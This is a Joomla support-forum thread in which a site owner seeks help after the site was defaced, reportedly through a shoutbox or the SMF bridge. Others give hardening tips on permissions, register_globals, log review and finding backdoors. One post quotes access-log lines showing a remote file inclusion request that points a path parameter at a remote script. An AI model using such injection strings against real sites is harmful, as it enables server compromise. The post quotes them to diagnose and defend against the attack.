The Joomla! Forum ™

Hello,

One of the membrers of my site's team reported me that log on our irc channel:





Some strange things happened recently in the forum with the old shoutbox (Ultimate Shoutbox v1.32). The shoutbox was filled by no nick shouts with dots and the "View all" link, linked to a stange page. McaFee also alerted me for a virus.

I'm using this software:

Forum:
SMF 1.1 RC2
SMF Shoutbox 1.04 
SMF Arcade 1.2.4b
Spoiler Tag 0.2.3
Ultimate Shoutbox 1.32

Portal:
Joomla! 1.0.10

Components:
AkoComment 2.0
ArtBanners 1.6
Banners 1.0.0
gigCalendar 1.0
Mass Mail 4.5.1
News Feeds 1.0.0
Polls
RD RSS 1.0.0
Simple Machines Forum Registration 1.1.5 (upgraded yesterday)
SMF Bridge 1.1.5 (upgraded yesterday)
Syndicate 1.0
Web Links 1.0
zOOm Media Gallery 2.5.1 RC1

Mambots:
AkoCommentBot 2.0
Code support 1.0
Email Cloaking 1.0
GeSHi 1.0.4
Imbed PHP 2.0
Load Module Positions 1.0.0
SEF 1.0.0
MOS Image Editor Button 1.0.0
MOS Pagebreak Editor Button 1.0.0
Search Categories 1.0.0
Search gigCalendar 1.0
Search Newsfeeds 1.0
Search Sections 1.0
SMF_header_include 1.1.5

Modules:
mod_artbanners1 1.7
mod_banners 1.0.0
mod_gigcal_minical 1.0
mod_gigcal_upcom 1.0
mod_latestnews 1.0.0
mod_lettermansubscribe
mod_mainmenu 1.0.0
mod_mostread 1.0.0
mod_newsflash 1.0.0
mod_poll 1.0.0
mod_random_image 1.0.0
mod_related_items 1.0.0
mod_search 1.0.0
mod_smf_login 1.1.5
mod_smf_Poll 1.0
mod_smf_recentTopics 1.0
mod_stats 1.0.0
mod_templatechooser 1.0.0
mod_whosonline 1.0.0
mod_wrapper 1.0.0
mod_zoom_menue 1b002
mod_zoom_pics  2b234 
mod_latest 1.0.0
mod_logged 1.0.0
mod_popular 1.0.0
mod_stats 1.0.0

Can it also be a problem of the server?

Please help me!

What did the hack look like?
What was the damage?
Do you have any components installed besides the listed software, anything still installed but not active?

Anything installed is in the post. Nothing was damaged, it sems to be only a warning. This is what he did: http://www.nintendopt.com/portal/syst.html
He also created a folder on my ftp server and aparently, could access the Joomla Admin Panel.

Moving thread to "Security" board.

_________________
Kenneth Crowder - Omaha, Nebraska, USA
Global Moderator - Joomla! ...because open source matters
Recipes for people with food allergies: http://intolerantoffspring.com
Author of "Joomla! 1.5: Developing Secure Sites": http://www.lynda.com/home/DisplayCourse.aspx?lpk2=73559

Just an assumption, since strange things occur in the shoutbox at first, there is a big chance that it has been used as the doorway.



Determine if this is generated using scripts from you host or has been uploaded via FTP. Check the HTML's modified date and search for raw logs with same date and time. From there you will find clues.



Is this screenshot came from the view of the hacker? or the one that reports?

Also, the hacker who defaced some of your pages is a member of a virtual hacking game which they claim to be non-real hacking game. In their rules, they do not want their members to hack in a real life situation.

Google the hacker's handle and you will find what I mean.

_________________
http://isulong.seoph.uenian.org/

How can I know if it was uploaded to the server? Iv'e found some entries with the file and folder name in the Raw Access Log.


I had access to it from the guy in the IRC. It's probably from the hacker. Does this mean he knows my password? How did I have access to it?

How can I prevent future situations?

The purpose of determining "how did that html file get into your site" is to know how did the hacker get in.

If that file has been generated using your own scripts then you will be having a hard time figuring which script is the culprit.

If the file has been uploaded via FTP or SSH then the hacker obviously knows your hosting login details.

If the file is neither generated by scripts nor has been uploaded, then we can assume that the hacker is hosting in the same host you are in and had used custom scripts to read and write to other accounts within the hosting network. This network vulnaribilities is caused by improper configurations in your host.

And since the hacker has a screenshot of the admin interface logged in your account, that means he knows your Joomla login details or worst used a password with the same hash as your hashed password.

You can prevent this to happen again once you discover how the hacker gets in.

You might want to change your hosting login details, Joomla login details and database details.

And be sure to check if the hacker didn't leave any backdoors (usually scripts accessible via URL) so he can get back into your box again and again without having to provide login details.

_________________
http://isulong.seoph.uenian.org/

Take a look


This is the first entry related to the hack I found in the log.

How can I know if he has left any backdoor?

The problem may be the software no? I mean, outdated versions.

He may have my database know. Does he has access to the members password? What other problems may this cause?

Rule of thumb, keep up to date. Since this is a new vulnerability for some components it is advisable to locked down your files and folders.

Basic permission should have the following:
Alter the permission to use CHMOD 644 to files and 755 on folders. To install new modules, mambots or components, you need to update your permission to writable again 777.

What about 3rd party addon (components, modules, mambots)?

If you are using any components that do not come bundled with mambo or joomla then it is advised to look in the php files for that component and make sure that it contains


/** ensure this file is being included by a parent file and stop direct linking */
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.'

towards the very top of the file (usually underneath file comments).


What about Register Globals ON or OFF?
Register globals should also be turned off if possible. Mambo or Joomla has the ability to emulate register globals on if necessary.

Continue reading this article for more update - http://www.hardworking.com/technology/c ... _site.html

goodluck and keep us posted.
em

_________________
[ http://www.MOSCOM.COM ] WebHosting 24x7 Phone Support.
[ http://www.KING.NET ] My Project ... converting to 1.6

erm 

hahaha I meant joomla/

_________________
[ http://www.MOSCOM.COM ] WebHosting 24x7 Phone Support.
[ http://www.KING.NET ] My Project ... converting to 1.6

I changed the chmod in Global configuration -> Server.

I think the hacker "entered" by the shoubox, so shouldn't I do something in the forum?


I ALL 3rd party addon files?

Huh? 

If you can't add this to your .htaccess file

php_flag register_globals off

continue checking this article for other Security and Permission.
http://www.hardworking.com/technology/c ... _site.html

regards,
em

_________________
[ http://www.MOSCOM.COM ] WebHosting 24x7 Phone Support.
[ http://www.KING.NET ] My Project ... converting to 1.6

But where should I register globals off, in the Joomla panel?
I will check it monday. I'm going on holiday tomorrow and today it's my birthday (yeah, the hack was a present  )

I checked the folders in the FTP and they haven't the chmod I set!

I'm trying to delete the files the hacker put in the server but I can't!!

Enjoy your vacation and b-day, relax for a bit.

_________________
[ http://www.MOSCOM.COM ] WebHosting 24x7 Phone Support.
[ http://www.KING.NET ] My Project ... converting to 1.6

Hello, I'm back 

I've talked to the hacker and he told me he did it just for fun, he didn't want to destroy anything.
I've already changed the passwords. However, I think he still has access to the FTP because he deleted the files he created, help!

O hacker é tuga? 

The hackers is...?

Well, pay attention to your hosting.

Vê lá qual o teu hosting, aliás, o datacenter é que deve ser rasco mas não sei, digo eu...

how did you turn on this multilanguage feature?

Yes it is.
I don't think the problem is on the host. The hacker told me he entered by the shoutbox,.

[quote="Astig"]And be sure to check if the hacker didn't leave any backdoors (usually scripts accessible via URL) so he can get back into your box again and again without having to provide login details.[/quote]
How can I check that?

I´m also Portuguese 

Ah so that's the trick

Ah dus dat is de truck

hi!

there is a smf-bridge exploit running threw web.

in my access-log there are many logs like

/component/option,com_smf/Itemid,28/components/com_smf/smf.php?mosConfig_absolute_path=http://URLEDITFORSECURITYREASONS/list.txt

or e.g.

/component/option,com_smf/components/com_smf/smf.php?mosConfig_absolute_path=http://URLEDITFORSECURITYREASONS/e4.php

is there a security hole in bridge and if so, which versions are affected?

mfg
Markus

PS: i also posted into smf-board: http://www.simplemachines.org/community ... 97#p648997

How can I check that?
[/quote]
Help!

http://forum.joomla.org/index.php/topic,75376.0.html

should be enough to keep the hacker out.

And what about the backdoor?

Well if you have been hacked and that hacker did leave a backdoor open, then you would have to clean your house and remove the backdoor or switch locks.

I guess if I were an inexperienced and slightly paranoia user I would rebuilt the entire website.
I would make a copy of the current, then install the Joomla version that was installed again and let it use the existing database thus keeping all data, then I would copy the template back and reinstall all extra's I used.

It's drastic but probably the only way of really knowing you have no hacker stuff on your Joomla site.

Can't it be removed by an antivirus scan by the hoster?

Very unlikely since it's usually not, such, a virus, besides I assume your hoster already does virus scans on all necessary servers.

No offence but is is obvious you have no idea what this is all about, don't you know someone you trust that has the capabilities to help you out with this? It's not rocketscience and usually the problem isn't as big as you might think it is.

I'm afraid not

But what is a backdoor? Some code inserted on a file? How can it be detected?

I'm no ecpert but I guess you usually will be quite safe if the files on your server are the same as the files in the original Joomla zipped file and the same goes for the installed extensions. Any file that is on your server and not in your originals can be what the hacker left behind. Make sure you empty all your cache files and use your brain!

change your passwords too

a thing to look at too are the file timestamps if there are files that are changed at the time you got hacked and you are sure that they weren't by you, they might be hacker modified.

Again, don't get too paranoid, usually it's just some script kiddy that defaced your website, unless your website is some interesting e-commerce site or something you won't be an interesting site for them, just a site for their ranking stats.

Whar is the url to your site anyway?